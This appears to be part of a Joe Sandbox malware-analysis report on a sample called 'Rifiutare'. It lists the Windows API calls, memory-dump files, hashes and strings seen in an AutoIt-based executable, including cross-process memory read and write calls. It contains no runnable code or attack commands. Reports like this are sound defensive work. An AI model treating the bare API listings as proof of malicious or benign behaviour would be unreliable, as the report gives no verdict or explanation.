                                                                                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?,?,?,00C90B7D), ref: 00C9084A
                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?,?), ref: 00C90865
                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?,?), ref: 00C90873
                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?), ref: 00C90883
                                                                                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?,?), ref: 00C9088F
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 3897988419-0
                                                                                • Opcode ID: ab71ccdc11de68f5b64655b07bf36c1aeebb7819988d4f3a6da22ee6795efc63
                                                                                • Instruction ID: e242d16c2c3280499fd45de3b624aa5ec61ff87d29476d1f1e0762eb54c10d8b
                                                                                • Opcode Fuzzy Hash: ab71ccdc11de68f5b64655b07bf36c1aeebb7819988d4f3a6da22ee6795efc63
                                                                                • Instruction Fuzzy Hash: BA017872600204AFDB115F54CC48FAE7BADEB847A2F240024F91AE6290E770DE809BE0
                                                                                APIs
                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00C9F16E
                                                                                • QueryPerformanceFrequency.KERNEL32(?), ref: 00C9F17C
                                                                                • Sleep.KERNEL32(00000000), ref: 00C9F184
                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00C9F18E
                                                                                • Sleep.KERNEL32 ref: 00C9F1CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                • String ID:
                                                                                • API String ID: 2833360925-0
                                                                                • Opcode ID: f55f345bde9b318fa013a0e724108fdbd1ccb9bb22d891535b708530b02ab89e
                                                                                • Instruction ID: b2cd1fcc9984f5e725603bab8ee3f4c1644be580a8a3bce602968574307dc9ea
                                                                                • Opcode Fuzzy Hash: f55f345bde9b318fa013a0e724108fdbd1ccb9bb22d891535b708530b02ab89e
                                                                                • Instruction Fuzzy Hash: 46011371C00629EBCF00AFA5D84DBEEBB79FB09711F05006AE912F2264DB309655C7A1
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C918A4
                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C918B0
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C918BF
                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C918C6
                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C918DC
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: 25213c11a70cbc5c1926c17e0e39fdabbc9ecab1231b6d4bd4d6954139081541
                                                                                • Instruction ID: a9c4ec39d450705b7accde4278be90895c9bd5be488d7854f2027e2ab7110f8a
                                                                                • Opcode Fuzzy Hash: 25213c11a70cbc5c1926c17e0e39fdabbc9ecab1231b6d4bd4d6954139081541
                                                                                • Instruction Fuzzy Hash: 18F06275100301ABDB121FA5EC4DF5A3B6DEF89760F150425FD4ACB2A0DA70D9019A60
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C91844
                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C91850
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C9185F
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C91866
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C9187C
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: 5493d08551e6403967bd5246e564abe9d672552b2d8d2583d0583f352179a8e1
                                                                                • Instruction ID: 4f879745e4a0edafb5c8f4a0877e86d22a3d46f448e827336f2ce295423cdc14
                                                                                • Opcode Fuzzy Hash: 5493d08551e6403967bd5246e564abe9d672552b2d8d2583d0583f352179a8e1
                                                                                • Instruction Fuzzy Hash: 7FF06D76200302ABDB111FA9DC4EF9A3BADEF89760F160464FE56C72A0DA70DC018A60
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00CA09E1,?,00CA3C13,?,00000001,00C74EA0,?), ref: 00CA0B7E
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00CA09E1,?,00CA3C13,?,00000001,00C74EA0,?), ref: 00CA0B8B
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00CA09E1,?,00CA3C13,?,00000001,00C74EA0,?), ref: 00CA0B98
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00CA09E1,?,00CA3C13,?,00000001,00C74EA0,?), ref: 00CA0BA5
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00CA09E1,?,00CA3C13,?,00000001,00C74EA0,?), ref: 00CA0BB2
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00CA09E1,?,00CA3C13,?,00000001,00C74EA0,?), ref: 00CA0BBF
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: 5786162e55171ace6b0e4d463c51216506e84a60533e474cc68c7dc9852172d0
                                                                                • Instruction ID: ffcbcd2af07d691c56e48886aa89dcec4f61f8de12f995cb3823946e487f93d4
                                                                                • Opcode Fuzzy Hash: 5786162e55171ace6b0e4d463c51216506e84a60533e474cc68c7dc9852172d0
                                                                                • Instruction Fuzzy Hash: 3701A271801B16DFCB309F66E980816FBF5BF513593258A3ED1A752931C370AA49CF90
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00C96474
                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C9648B
                                                                                • MessageBeep.USER32(00000000), ref: 00C964A3
                                                                                • KillTimer.USER32(?,0000040A), ref: 00C964BF
                                                                                • EndDialog.USER32(?,00000001), ref: 00C964D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 3741023627-0
                                                                                • Opcode ID: 61b7414065d7189eeb4408f46ec5f7cec72042d7f9e5d566b716eb7d0bb8707f
                                                                                • Instruction ID: 880ae3279fc88c84c6b0ae83f25b94cfe9e53834772ad875dbe061654b71f339
                                                                                • Opcode Fuzzy Hash: 61b7414065d7189eeb4408f46ec5f7cec72042d7f9e5d566b716eb7d0bb8707f
                                                                                • Instruction Fuzzy Hash: 9D013130500714ABEF359B60DD5EF9A77B8BF00705F004969F697A14E1DBF4AA54CB90
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00C6264E
                                                                                  • Part of subcall function 00C62DE8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C6DBF1,?,00000000,?,00000000,?,00C6DC18,?,00000007,?,?,00C6E016,?), ref: 00C62DFE
                                                                                  • Part of subcall function 00C62DE8: GetLastError.KERNEL32(?,?,00C6DBF1,?,00000000,?,00000000,?,00C6DC18,?,00000007,?,?,00C6E016,?,?), ref: 00C62E10
                                                                                • _free.LIBCMT ref: 00C62660
                                                                                • _free.LIBCMT ref: 00C62673
                                                                                • _free.LIBCMT ref: 00C62684
                                                                                • _free.LIBCMT ref: 00C62695
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 1057b6969cef02d1ca595b205fe20d270584f40ef0b16dfb1de4e17ddcd6cd26
                                                                                • Instruction ID: 7572f2a52af23ec535856a1c7cbd99d4d5bd05c0431fb9939df52c6e259ced81
                                                                                • Opcode Fuzzy Hash: 1057b6969cef02d1ca595b205fe20d270584f40ef0b16dfb1de4e17ddcd6cd26
                                                                                • Instruction Fuzzy Hash: B4F0DA75802B219BCA216F65BC857683B66BF147A17010107F459E63B1CB314942EBEA
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: __freea$_free
                                                                                • String ID: a/p$am/pm
                                                                                • API String ID: 3432400110-3206640213
                                                                                • Opcode ID: 7500b462faeb32b8d10566208a97f2bb209d9f0bf6b1a0d68c708230be899e1b
                                                                                • Instruction ID: f7b26d1acb3eadedd38601a556fb3f821a56e5bc19fef023eacf3e9b7a2a787d
                                                                                • Opcode Fuzzy Hash: 7500b462faeb32b8d10566208a97f2bb209d9f0bf6b1a0d68c708230be899e1b
                                                                                • Instruction Fuzzy Hash: 75D11475904206CBDB389F69C8D57BAB7B1FF05312F2C4159ED22AB250D7358E81DBA0
                                                                                APIs
                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C746C0
                                                                                  • Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE
                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C34CF4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoadNotifyShell_String_wcslen
                                                                                • String ID: Line %d: $AutoIt -
                                                                                • API String ID: 2289894680-4094128768
                                                                                • Opcode ID: 9d127e6f04fba829caac2cf4584c231f165dc738f85b0ea6f8eccc5555e46034
                                                                                • Instruction ID: eccd549f06d2c9b31718bb981bfd8fff94d5db6505a019e813a402b5fc8866fb
                                                                                • Opcode Fuzzy Hash: 9d127e6f04fba829caac2cf4584c231f165dc738f85b0ea6f8eccc5555e46034
                                                                                • Instruction Fuzzy Hash: DD41D7714193046AC729EB20EC45FEF77DCAF44710F004A2EF599931A1EB70AA49D797
                                                                                APIs
                                                                                  • Part of subcall function 00C9BC27: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C929D0,?,?,00000034,00000800,?,00000034), ref: 00C9BC51
                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C92F60
                                                                                  • Part of subcall function 00C9BBF2: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C929FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00C9BC1C
                                                                                  • Part of subcall function 00C9BB4E: GetWindowThreadProcessId.USER32(?,?), ref: 00C9BB79
                                                                                  • Part of subcall function 00C9BB4E: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C92994,00000034,?,?,00001004,00000000,00000000), ref: 00C9BB89
                                                                                  • Part of subcall function 00C9BB4E: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C92994,00000034,?,?,00001004,00000000,00000000), ref: 00C9BB9F
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C92FCD
                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C9301A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                • String ID: @
                                                                                • API String ID: 4150878124-2766056989
                                                                                • Opcode ID: e147486edb675df9dca75d48ec0f7e054933edf62ccd3d7322465769eb39aae5
                                                                                • Instruction ID: 5bc13643da94bdc4857577f25a9da187ea6a6c4c78e8fb5b9caac449642abd98
                                                                                • Opcode Fuzzy Hash: e147486edb675df9dca75d48ec0f7e054933edf62ccd3d7322465769eb39aae5
                                                                                • Instruction Fuzzy Hash: DD410876900218BBDF10DFA4CD85AEEBBB8EB49700F004095FA55B7180DB70AE85DB61
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C9CA5C
                                                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 00C9CAA2
                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D029B0,017B4310), ref: 00C9CAEB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Delete$InfoItem
                                                                                • String ID: 0
                                                                                • API String ID: 135850232-4108050209
                                                                                • Opcode ID: cd59edcac0fd67b9e15a4b44f77c15ca8c63140e097506ff782cb3050b85a45d
                                                                                • Instruction ID: 702c5de6e79b286a685032fdfdac194d003c30a4677a8f7c06eb17e4bc16721d
                                                                                • Opcode Fuzzy Hash: cd59edcac0fd67b9e15a4b44f77c15ca8c63140e097506ff782cb3050b85a45d
                                                                                • Instruction Fuzzy Hash: D741A0712043419FDB20DF24C8C9F1ABBE4EF85754F14462DF56597292EB70EA04DB62
                                                                                APIs
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CCDBF4,00000000,?,?,?,?), ref: 00CC4B86
                                                                                • GetWindowLongW.USER32 ref: 00CC4BA3
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CC4BB3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long
                                                                                • String ID: SysTreeView32
                                                                                • API String ID: 847901565-1698111956
                                                                                • Opcode ID: ddc2ec2b7276b9d60dd5b310be85edbbc4c82b723712bdff8938c1eb065030e4
                                                                                • Instruction ID: 6becd0afb32f2a4bca77fb7404c2c7521c54d30ddd9dcc62d822c0f395c36248
                                                                                • Opcode Fuzzy Hash: ddc2ec2b7276b9d60dd5b310be85edbbc4c82b723712bdff8938c1eb065030e4
                                                                                • Instruction Fuzzy Hash: B6317C31200609ABDB158E74CCA5FEA7BA9EB48334F208728F979921E0D730ED519B50
                                                                                APIs
                                                                                  • Part of subcall function 00CB3B2E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00CB384A,?,?), ref: 00CB3B4B
                                                                                • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00CB384D
                                                                                • _wcslen.LIBCMT ref: 00CB386E
                                                                                • htons.WSOCK32(00000000,?,?,00000000), ref: 00CB38D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                • String ID: 255.255.255.255
                                                                                • API String ID: 946324512-2422070025
                                                                                • Opcode ID: 862fa8c3103239616c0c0bf832607f9afedfd6b68d002b699f3a2d8dd2cc6f8d
                                                                                • Instruction ID: 2a6187aa765034886aaee54435131c46c5f1da563818bf01fb3ce3f795208cf8
                                                                                • Opcode Fuzzy Hash: 862fa8c3103239616c0c0bf832607f9afedfd6b68d002b699f3a2d8dd2cc6f8d
                                                                                • Instruction Fuzzy Hash: 3331E1796002819FCB10CF69C485EA97BE1EF14318F24815AF8268B3E2D772EF45C761
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00CC461A
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00CC462E
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CC4652
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window
                                                                                • String ID: SysMonthCal32
                                                                                • API String ID: 2326795674-1439706946
                                                                                • Opcode ID: ffcf069c949ce604f60a31fc3be40d3217dfcea6c80e18357c7959aac18e1dd6
                                                                                • Instruction ID: cb35ac736670551835bcd18e05d7725783a3d68b47300360b789cddedb9a0075
                                                                                • Opcode Fuzzy Hash: ffcf069c949ce604f60a31fc3be40d3217dfcea6c80e18357c7959aac18e1dd6
                                                                                • Instruction Fuzzy Hash: 0921D132600228BBDF158F64CC46FEE3B65EF48714F114218FE15AB1D0DAB1E855DB90
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CC4DE1
                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CC4DEF
                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CC4DF6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DestroyWindow
                                                                                • String ID: msctls_updown32
                                                                                • API String ID: 4014797782-2298589950
                                                                                • Opcode ID: 42640ffdd2559c65baad024def34c4c845485c051ad6254bdc34f5463c001778
                                                                                • Instruction ID: 13f8f264af03fa1cf05d0c12931b8c8b8dfdea745305547e4661cc50796aacac
                                                                                • Opcode Fuzzy Hash: 42640ffdd2559c65baad024def34c4c845485c051ad6254bdc34f5463c001778
                                                                                • Instruction Fuzzy Hash: 522160B5600209AFEB14DF28DC95EBB37ADEB5A3A4B004059FA159B361CB30ED519B60
                                                                                APIs
